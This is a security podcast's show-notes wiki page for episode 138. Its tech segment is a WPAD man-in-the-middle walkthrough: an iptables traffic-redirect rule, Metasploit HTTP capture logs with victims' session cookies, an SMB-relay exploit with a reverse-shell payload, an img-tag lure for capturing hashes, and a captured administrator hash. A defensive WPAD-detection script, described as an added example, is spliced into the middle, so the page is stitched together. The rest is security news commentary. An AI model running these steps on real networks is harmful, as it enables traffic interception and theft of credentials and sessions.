Episode138

From Security Weekly Wiki

Sponsors

  • Tenable Network Security - This episode is sponsored by Tenable Network Security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the world's best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the world's best penetration testing tool.
  • Trustwave SpiderLabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!


Announcements & Shameless Plugs

Welcome to PaulDotCom Security Weekly, Episode 138 for January 29th, 2009. A show for security professionals and by security professionals who have way too much access to beer. And computers. And Maltego.


Tech segment: WPAD Attacks & Metasploit 3.2 - Part I

WPAD is a feature within Windows that allows the web browser to automatically find the proxy server on the network, and configure it for the local system. It does this in a very interesting way, by looking up the DNS name "wpad.<my domain>.com" and making a request as follows:

GET /wpad.dat HTTP/1.0

The "wpad.dat" file contains the IP address and port of the proxy server the client should use.
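A defender's view of the same mechanism, as an added example (this is not code from the show notes or from any tool mentioned on the page): a small Python script that scans access-log lines for wpad.dat fetches answered by any host other than the sanctioned WPAD server, and parses a wpad.dat (PAC) body to list every proxy endpoint it would push to clients. The log-line layout, the trusted-server list, the sample PAC and all addresses are constructed for the example; the PAC check also accepts the HTTPS and SOCKS directives browsers allow alongside PROXY, which goes slightly beyond the plain "IP and port" description above.

```python
import re
from typing import Dict, Iterable, List, Set

# Constructed sample request-log lines in a simple
# "client -> server METHOD path HTTP/ver status" layout. The layout is an
# assumption for this example; adapt LOG_RE to your proxy or web server's
# real access-log format.
SAMPLE_LOG = """\
192.168.1.246 -> 192.168.1.10 GET /wpad.dat HTTP/1.0 200
192.168.1.246 -> 192.168.1.10 GET /index.html HTTP/1.1 200
192.168.1.250 -> 192.168.1.88 GET /wpad.dat HTTP/1.0 200
192.168.1.251 -> 192.168.1.88 GET /WPAD.DAT HTTP/1.0 200
not a log line at all
"""

# Hypothetical: the only host that should ever answer a wpad.dat request here.
TRUSTED_WPAD_SERVERS: Set[str] = {"192.168.1.10"}

LOG_RE = re.compile(
    r"^(?P<client>\S+) -> (?P<server>\S+) (?P<method>[A-Z]+) "
    r"(?P<path>\S+) HTTP/\S+ (?P<status>\d{3})$"
)


def find_wpad_fetches(lines: Iterable[str], trusted: Set[str]) -> List[Dict[str, object]]:
    """One record per wpad.dat fetch, marking whether the serving host is sanctioned."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than abort the scan
        # Compare case-insensitively: the file name may be logged in any case.
        if m.group("path").lower() != "/wpad.dat":
            continue
        server = m.group("server")
        hits.append({"client": m.group("client"), "server": server, "trusted": server in trusted})
    return hits


def rogue_wpad_servers(lines: Iterable[str], trusted: Set[str]) -> Set[str]:
    """Hosts that served wpad.dat but are not on the trusted list."""
    return {str(h["server"]) for h in find_wpad_fetches(lines, trusted) if not h["trusted"]}


# Constructed sample PAC body of the kind a wpad.dat file carries.
SAMPLE_PAC = """\
function FindProxyForURL(url, host) {
    if (isPlainHostName(host)) return "DIRECT";
    return "PROXY 192.168.1.88:80; PROXY proxy.corp.example:3128; DIRECT";
}
"""

# PAC return strings list proxies as "PROXY host:port"; browsers also accept
# HTTPS and SOCKS variants, so those keywords are matched too.
PROXY_RE = re.compile(r"\b(?:PROXY|HTTPS|SOCKS[45]?)\s+([A-Za-z0-9.\-]+:\d+)")


def pac_proxies(pac_text: str) -> Set[str]:
    """Every host:port the PAC file could steer a client through."""
    return set(PROXY_RE.findall(pac_text))


def unexpected_proxies(pac_text: str, allowed: Iterable[str]) -> Set[str]:
    """Proxy endpoints in the PAC file that are not on the allow-list."""
    return pac_proxies(pac_text) - set(allowed)


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for hit in find_wpad_fetches(lines, TRUSTED_WPAD_SERVERS):
        flag = "ok   " if hit["trusted"] else "ROGUE"
        print(f"{flag} {hit['client']} fetched wpad.dat from {hit['server']}")
    print("unexpected proxies in PAC:", unexpected_proxies(SAMPLE_PAC, {"proxy.corp.example:3128"}))
```

The two checks complement each other: the log scan tells you which clients were steered to an unsanctioned WPAD server, and the PAC parse tells you where a suspicious wpad.dat would have sent their traffic, which is exactly the information you need to decide which hosts to investigate.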

You will then need to redirect all HTTP traffic to an IP address and port that is running a proxy. You can do this in Linux with:

/sbin/iptables -t nat -A PREROUTING -s 192.168.1.0/255.255.255.0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 192.168.1.88

Credit: http://www.ex-parrot.com/~pete/upside-down-ternet.html :)

You can try using tinyproxy or Squid to handle the redirected traffic. First bring up the address the DNAT rule points at:

ifconfig eth0:1 192.168.1.88 netmask 255.255.255.0

Then point tinyproxy at it. Below is the tinyproxy config:

Port 80
Listen 192.168.1.88
Allow 192.168.1.0/24

The above works great, if you only want to snoop on all HTTP traffic, which can be interesting.

Run Metasploit:

msf > use auxiliary/server/capture/http 
msf auxiliary(http) > set FORMSDIR /metasploit/framework-3.2/myhttp/forms
FORMSDIR => /metasploit/framework-3.2/myhttp/forms
msf auxiliary(http) > set SITELIST /metasploit/framework-3.2/myhttp/sites.txt
SITELIST => /metasploit/framework-3.2/myhttp/sites.txt
msf auxiliary(http) > set SRVHOST 192.168.1.229
SRVHOST => 192.168.1.229
msf auxiliary(http) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(http) > set SSL false 
SSL => false
msf auxiliary(http) > set TEMPLATE /metasploit/framework-3.2/myhttp/index.html
TEMPLATE => /metasploit/framework-3.2/myhttp/index.html
msf auxiliary(http) > exploit
[*] Auxiliary module running as background job
msf auxiliary(http) > 
[*] Server started.

[*] HTTP REQUEST 192.168.1.246 > www.i-hacked.com:80 GET / Windows IE 7.0 cookies=mosvisitor=1; 97e6aefafad7fca1092546ba935d59f1=5390e4fb65942b827cc8221294e0e229; __utma=128795412.1799712433591043600.1233350820.1233350820.1233350820.1; __utmb=128795412.1.10.1233350820; __utmc=128795412; __utmz=128795412.1233350820.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
[*] HTTP REQUEST 192.168.1.246 > google.com:80 GET / Windows IE 7.0 cookies=PREF=ID=a656bc696693fd3f:TM=1233349495:LM=1233349495:S=uu5i7X-pUjk3Iq7L; NID=19=R2E6AOPpdtOd-ngandXg1vuKngS5_1bHbjrNUh47kYSeSw99gjU5_b6MPeVhZy6nr0LitgPIIylAZzSiF9KJat54m5uC8NnDAR5ZvuMHmkM0Wdpq-RTwqlDd3nVhkt7W

msf > use exploit/windows/smb/smb_relay 
msf exploit(smb_relay) > set SRVHOST 192.168.1.229
SRVHOST => 192.168.1.229
msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.

[*] Received 192.168.1.246:4295 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.1.246:4295 \
[*] Received 192.168.1.246:4297 PAUL-WINDOWS-VM\Administrator LMHASH:faa8<snip>d530d NTHASH:a7a660f836<snip>fd3 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1

The index.html file contains:

<img src="\\192.168.1.229\Share\pic.jpg">

Important! Make sure it's set to your IP address! Of course, the next step is to get Metasploit working and relaying traffic to the ultimate destination while still being able to do the SMB relay.

Stories For Discussion

Social Engineering To Become A Police Officer

0wned By Compliance - [PaulDotCom] - Anton goes through some seemingly realistic scenarios as to why/how a merchant can be 0wned, even if PCI compliant. Yes, PCI still has merit as a "Standard", but this does not mean they are secure. I think this is where people go wrong: PCI, in my opinion, just proves that you are doing some stuff in the name of security. This is important when companies want to work together; they can ask, "Are you PCI compliant?" and have some sense that they are implementing security. Or are they? Anton points out it depends on who is doing the audit; anyone can walk in and ask "Do you have a firewall?", answer: "yes". Reminds me of a story about a firewall with two holes in it, through which an Ethernet cable was being passed, therefore all traffic was "going through the firewall".

PADJACK, really? - [PaulDotCom] - I hate to rip on companies. I believe in hard work and a free market, and I like to think that in every company there are honest people working their butts off. However, I'm going to go out on a limb here and say, wow, this is stupid. My bet, Larry can bypass this in about 5 seconds and gain access to the port. This is just the wrong way to approach the problem. A piece of plastic is not going to stop an attacker; it may slow them down for a few seconds, but does not provide enough security to make it worthwhile.

Dradis v2 - Larry - Dradis is a tool (Linux) used for sharing information across multiple folks on a pen test. Looks pretty cool, and I'm going to check it out. We've talked about using a wiki for this in the past, but it can easily get overwhelmed with disorganized information. Dradis features a nice hierarchical structure that may work for some people.

USB Drive Threat & Solutions - [PaulDotCom] - It's no question, there are threats that USB drives pose to your organization. I like to use the Coke example. Coca-Cola has the secret recipe to its famous Coke soda. It's locked away somewhere in the Coke factory. For the purposes of this example, let's say that it's on the network somewhere, and not just written down on paper. You can train the users all you like, someone is going to plug something into the computer that could steal the Coke recipe, or be used to make a copy of it. The solution? There is software on the market that will limit which devices you can plug into your systems in the domain. I won't mention vendors; you should evaluate all the options and make a decision for yourself. The one I tested worked well, provided you were not admin on the machine. The software does limit the USB pen testing scenario we talk about; however, to steal something, make sure there is no CD-Writer in the machine :)

Zombies ahead! - [Larry] - Nice job to the i-hacked guys. Beware, Zombies! They illustrated how to change the output on those traffic signs on the side of the road, which was incredibly easy to change (go figure, they need to be usable by a diversely educated crowd). I find it amusing that now Texas (and allegedly the country) is "scrambling" to secure these devices. Looks like in the past the default passwords were left, slightly changed, or written inside the boxes. Texas DOT claims the boxes were locked, but how many of us think that it is true? How easily are padlocks bypassed? I think what this really boils down to is the total commitment to apathy on security in other fields... if they didn't want this stuff messed with, they should take steps to make it "un-messable".

Looking forward to these Shmoo talks:

  • One Track Mind: Building the 2008 and 2009 ShmooBall Launchers, Larry Pesce and David Lauer
  • Building an All-Channel Bluetooth Monitor, Michael Ossmann and Dominic Spill
  • Man in the Middling Everything with The Middler, Jay Beale
  • Building Wireless Sensor Hardware and Software, Travis Goodspeed and Joshua Gourneau
  • Storming the Ivy Tower: How to Hack Your Way into Academia, Sandy Clark (Interesting, I gave a similar presentation a loooong time ago. Go easy, it was a looong time ago and it well, okay it kinda stinks, but some cool stuff in there still, I think).

Best talk title: 802.11 ObgYn or "Spread Your Spectrum", Rick Farina


YouTube and Geotagging - [Larry] - I had the pleasure of chatting with Mark about this one. Mark's been doing some research with Google and YouTube and the geotagging of the videos. It seems pretty random where the geotagged data comes from, but we're both betting that some folks know how it got there. Mark's method is great for taking the YouTube ID and tracking it to a location. Mark thinks he might know where a few internet celebrities live. Hello Obama girl!

Damn Vulnerable Linux 1.5 is out! - [Larry] - DVL is a great way to put a system in your lab that you can test against. It has plenty of holes so you're almost guaranteed a successful compromise.

Don't forget the internal threat - [Larry] - This sounds like an almost disastrous situation that was avoided by Fannie Mae. Someone *ahem* needs to look at their employee termination practices, especially with folks that have elevated rights...